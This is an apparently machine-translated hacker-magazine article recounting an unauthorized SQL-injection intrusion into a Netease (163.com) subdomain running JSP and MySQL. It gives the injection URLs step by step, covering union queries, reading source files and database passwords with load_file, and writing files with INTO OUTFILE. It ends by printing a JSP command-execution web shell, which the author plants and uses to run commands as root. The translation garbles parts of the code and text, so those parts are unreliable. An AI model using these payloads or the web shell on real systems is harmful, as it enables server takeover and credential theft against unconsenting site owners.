Netease's intrusion detection-can be viewed as JSP + MySQL intrusion

The file has been published in the hacker XFile

By Jianxin [B .c.t]
Reprinted with the source

163.com is a well-known portal website in China that provides various services, including email, etc. I don't know where there will be any vulnerabilities! Just recently I learned some injection knowledge and want to perform some small security checks on these portal websites. I don't know if their scripts are as powerful as their reputation!
If you don't need to talk about it, let's go to the pages that PASS Parameters to check if there is a parameter that is not filtered. Then we can drill it down! Netease scripts are basically in the form of JSP and PHP. The main site looks static, so don't mention it. There should be so many JSP and PHP sites on other sites! PHP injection has also been poorly studied, and it is quite uncomfortable to be blocked by the PHP feature during the injection, So I simply went to the JSP script, we hope to find some unfiltered parameters. I found the time to play two Cs really let me find a page http://XXX.163.com/wap/content.jsp? Id = 120, haha. It seems to be a numeric variable! I like numeric type variables that are not filtered, because if they can be injected, there is basically no obstacle! Let's see if it can be injected! Submit:

Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 1
Returns normal.

Then submit:
Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2
Returns a bunch of JSP errors, 2,

We have also achieved the path of the web! We also know from the path that this system is a Linux system.

Based on the above two predictions, it is very likely that this is an injection point! Because the and 1 = 1 and 1 = 2 we submitted are executed as SQL code! If the parameter is not filtered, we can submit our injection code here! Let's continue! Because jsp can be used with many databases, let's take a look at what database it is! Submit:

Http://XXX.163.com/wap/content.jsp? Id = 120/* Jianxin
Returned result 3

It seems that the/* Comment is supported. The support/* comment here should be the MySQL database! Now that we know it's a MySQL database, let's take a look at the system version. It would be helpful to guess the table and inject it if it was later than 4.0! Submit:

Http://XXX.163.com/wap/content.jsp? Id = 120 and ord (mid (version (),)> 51 /*
If a normal result is returned, it seems that the version is later than 4.0, that is, Union query is supported! Here, the statement is used to retrieve the first character of the version, which is greater than 3, of which 51 is a 3 ASCII character! Since Union query is supported, let's look at the number of fields! Submit:

Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select 1 /*
Error 4 returned

Continue submission:
Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select 1, 2 /*
Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select 1, 2, 3 /*
......
To http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select 1, 2, 4, 5, 6, 7, 8, 9, 10 /*
Returns the normal result 5.

10 fields are displayed on the page! Hey, now we can query the union operation. Let's take a look at the database information! Submit:
Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select, 5, user (), Database (), version ()/*
Return result 6

We know the database name, user connection name, and specific database version! So what should we do next? Look at the special user. This user may be an administrator or another role! First, check whether the permission is large enough. The key is whether the file can be read and written! Submit:

Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select, 5, user (), Database (), 10 into OUTFILE '/tmp/jnc.txt '/*
Hey hey, note that this is different from PhP injection. jsp will not escape any submitted characters! Therefore, we can submit it with confidence. From the above example, we know that the system is of the Linux class, so the directory is generally writable when writing files to/tmp/jnc.txt. Then submit:

Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select, 5, user (), Database (), load_file ('/tmp/jnc.txt ')/*

Returns 7

Figure 8

It seems that both file writing and reading are successful! You have the file permission. In a JSP environment, you can write files to any extent permitted by the permissions without being affected by the PHP features! Now that you have permissions, you can determine whether the web and MySQL servers are a host. If so, you can avoid the headache of guessing the password! When the web path comes out, we will read the files on the web server. If so, it should be a host! Submit:
Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select, 5, user (), Database (), load_file ('/home/project/web163/web/content. JSP ')/*

Read our content. jsp, haha, 9

, Success! After reading a few more files, the system returns a successful response, indicating that it is a server! Now you are welcome! Continue reading! Of course the password is what we are interested in! Looking at the source file returned just now, we found that it contains function. jsp, So we read the content of function. jsp and submit it:

Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select, 5, user (), Database (), load_file ('/home/project/web163/web/function. JSP ')/*
Return result 10

Haha. Check the source file and get the password! After getting the password, let's try connecting! Connect to your MYSQL client and enter the obtained password. Result 11:

MySQL rejects login from other IP addresses! Although MySQL cannot be connected, do we already have an injection point? You can also write and read files, so proceed from the script!
Now that you know the web path and can write files, can you use into OUTFILE to export a webshell? Try it! Submit:

Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select, into OUTFILE '/home/project/web163/web/JNC. jsp '/*
However, the results were quite depressing. Writing to/tmp/would be easy to use. writing to the web directory would not work. I tried this result many times. It seems to be the reason for permission! One of the major advantages of Linux is that the permissions are well set. By default, only the Creator has the permission to modify the file. The user we use is mysql. Of course, files cannot be created in the Apache directory! The intrusion has encountered the first obstacle, and there is no solution for the moment!
We are engaged in script security. If there is no way, we should go back to the script! The error "403forbiden" is prompted when a/admin is added to the root directory. Haha, This is the Directory management! As a result, I was eager to submit login.jspand login.html and all background login files that I thought were possible. But the server gave me a 404 error, which is depressing! I want to get some inspiration from other backgrounds and guess the background login path, but I still cannot find the background login file. This path is also here!
It's time to stop and think about it! After listening to Jay Chou's song, I suddenly thought that Linux servers are safe, but I don't know if there will be human security vulnerabilities? On some other websites, I often see that in addition to some common directories, the Administrator also sets the test directory to facilitate other administrators to debug scripts, and the permission for this directory is usually set to 777, that is, the everyone is readable and writable. If such a directory exists ...... go to the website and submit:

Http://XXX.163.com/test/
404 does not exist
Http://XXX.163.com/wap/test/
403 forbidden, haha. It's really a sense of a CS storm! Submit now:

Http://XXX.163.com/wap/content.jsp? Id = 120 and 1 = 2 Union select, into OUTFILE '/home/project/web163/web/test/jnc.txt '/*
Access the http://XXX.163.com/wap/test/jnc.txt12 when an error is returned

Haha! It seems that I have discovered a potential security risk! This is experience! Okay, you can export it as a TXT file. How can you export it as a PHP file? I wrote a Trojan to export it into a PHP file. When I access this PHP file, I am prompted to download it. It seems that the web directory only supports the JSP suffix, so we can only export it into a JSP file! So I immediately went to the JSP backdoor and found the shortest one:

<% @ Page import = "Java. Io. *" %>
<%
Try {
String cmd = request. getparameter ("cmd ");
Process child = runtime.getruntime(cmd.exe C (CMD );
Inputstream in = Child. getinputstream ();
Int C;
While (C = in. Read ())! =-1 ){
Out. Print (char) C );
}
In. Close ();
Try {
Child. waitfor ();
} Catch (interruptedexception e ){
E. printstacktrace ();
}
} Catch (ioexception e ){
System. Err. println (E );
}
%>
Is it possible to execute a command in the URL to access JNC. jsp? Cmd = command. Because we use into OUTFILE to export files and use them in Union queries, the exported content must be at the end of union, otherwise, we will not be able to get our results. Before the export, we will write the JSP statement into a row, which will not affect JSP execution but facilitate export! Let's take a look at it. It seems that the characters are too long and get may not meet the requirements. So write your own HTML! The content is as follows:

<Form action = http://XXX.163.com/wap/content.jsp method = post>
<Input name = ID type = text size = 1000>
<Input type = submit>
</Form>

Then write in the submission column:

120 and 1 = 2 Union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 'Write in a line of Trojan statement 'into outfile'/home/project/web163/web/test/JNC. JSP '/*, 13

Click Submit and go to the test directory. Haha, our Trojan really exists! Submit:

Http://XXX.163.com/wap/test/jsp3.jsp? Cmd = ID
Returned result 14

Haha, it was started with root, with the highest permissions! This saves us the privilege! At this point, a security check for 163.com is complete!
Through the above example, we can see that although a small parameter is not filtered, and some other security reasons are added, the result may be the fall of the server, not only the 163.com administrator should pay attention to this, but all administrators should pay attention to this.